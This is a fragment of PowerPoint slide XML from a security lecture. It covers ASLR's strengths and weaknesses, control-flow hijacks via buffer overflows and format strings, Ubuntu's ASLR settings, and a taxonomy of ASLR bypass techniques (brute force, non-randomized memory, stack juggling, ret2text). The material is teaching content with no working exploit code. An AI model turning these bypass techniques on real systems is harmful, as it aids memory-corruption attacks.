        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3621706390"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="91710"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="91710"/>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ASLR Scorecard</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57977312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1737361"/>
          <a:ext cx="8229600" cy="3688080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{FABFCF23-3B69-468F-B69F-88F6DE6A72F2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
                <a:gridCol w="5791200"/>
              </a:tblGrid>
              <a:tr h="429497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Address Space Layout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Randomization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="429497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Performance</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>excellent—randomize once at load time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="1059426">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>turn on kernel support</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>(Windows:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>opt-in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> per module, but system override exists)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>no recompilation necessary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="773095">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Compatibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>transparent to safe apps</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(position independent)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="676524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Safety Guarantee</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>not good </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" smtClean="0"/>
                        <a:t>on x32, much better on x64</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>code injection may not be necessary…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306110514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Hijacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>… happen when an attacker gains control of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>the instruction pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two common hijack methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>format string attacks</a:t>
            </a:r>
          </a:p>
          <a:p>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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38836239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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Ubuntu - ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>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by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>[Ubuntu-Security]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monaco" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Prior to Ubuntu 8.10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>In later releases: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>stack/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> ASLR: since kernel 2.6.15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Ubuntu 6.06)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> ASLR: since kernel 2.6.26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>(Ubuntu 8.10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>exec ASLR: since kernel 2.6.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Position Independent Executable (PIE) with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>fPIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>–pie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3482901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a:xfrm>
            <a:off x="457200" y="266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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600" b="1" dirty="0"/>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>
              <a:ext cx="2120900"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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
